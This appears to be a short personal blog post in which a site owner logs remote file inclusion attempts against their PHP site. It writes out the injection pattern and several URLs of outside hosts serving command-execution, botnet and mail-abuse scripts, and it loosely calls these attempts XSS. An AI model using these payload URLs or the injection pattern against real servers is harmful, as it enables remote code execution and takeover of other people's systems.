A couple of examples of pathetic attempts to hack my site. The attempts virtually always consist of loading a page in the form of http://qfox.nl/index.php?a=http://newpage? hoping the page will be loaded remotely and parsed by my server, giving the scriptkiddy access to my server.The fact all those urls end with a questionmark is remarkable. Like it's a specific exploit. For most of them their first attempt is also their first hit on my website. This means they visited my site with another ip before trying to XSS it, or my site is listed somewhere and they simply try.Often these scripts are removed very soon after the attempt, but sometimes they exist longer. Enjoy while you can (
at your own risk!) :
http://diemuellers.org/n? (Simple script, tries to execute commands on your server remotely)
You can read more about this botnet here.http://amyru.h18.ru/images/cs.txt? (Extended script allowing the scripkiddy to control your server and if I read the script right your server becomes a drone in a botnet)
http://www.csmksa.org/bbs/data/Sports/2003_group4.JPG?&cmd=id (Image injection exploit, quick and dirty)
http://n2.myftp.org/cmd.txt? (This one got caught by it's host :D)
http://www.geocities.com/sina_amoo//cedarsresort.txt? (An extended script trying to abuse the mailserver of your server, includes an emailaddress)Oh and this one, not half an hour after posting this blog:
http://www.redcluster.net/modules/forums/admin/st0rm.gif? (Script tries to abuse mailserver, includes a hotmail address! boot.unknown@hotmail.com)I'm gonna put up a list of encountered XSS attempts soon. And anyone caught trying to XSS my site will be banned, no excuses. Consider yourself warned.